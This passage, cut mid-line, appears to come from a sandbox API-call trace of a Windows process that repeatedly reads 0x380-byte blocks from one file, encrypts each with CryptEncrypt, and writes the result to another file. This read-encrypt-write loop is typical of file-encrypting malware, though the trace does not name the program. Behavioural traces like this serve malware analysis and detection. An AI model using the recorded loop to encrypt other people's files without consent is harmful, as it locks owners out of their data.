pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.603] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.603] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.603] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.603] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.604] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.604] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.604] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.604] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.604] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.604] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.604] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.604] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.604] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.604] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.604] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.604] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.604] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.604] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.604] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.604] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.605] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.605] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.605] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.605] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.605] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.605] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.605] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.605] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.605] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.605] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.605] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.605] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.605] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.605] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.606] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.606] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.606] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.607] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.607] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.607] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.607] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.607] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.607] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.607] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.607] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.607] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.607] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.607] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.607] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.607] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.608] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.608] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.608] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.608] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.608] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.608] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.608] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.608] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.609] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.609] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.609] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.609] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.609] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.609] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.609] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.609] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.609] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.609] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.610] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.610] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.610] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.610] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.610] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.610] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.610] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.610] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.610] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.610] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.634] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.634] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.634] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.634] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.634] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.634] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.634] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.634] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.634] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.634] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.635] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.635] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.635] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.635] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.635] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.635] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.635] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.635] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.635] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.635] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.635] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.635] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.661] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.661] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 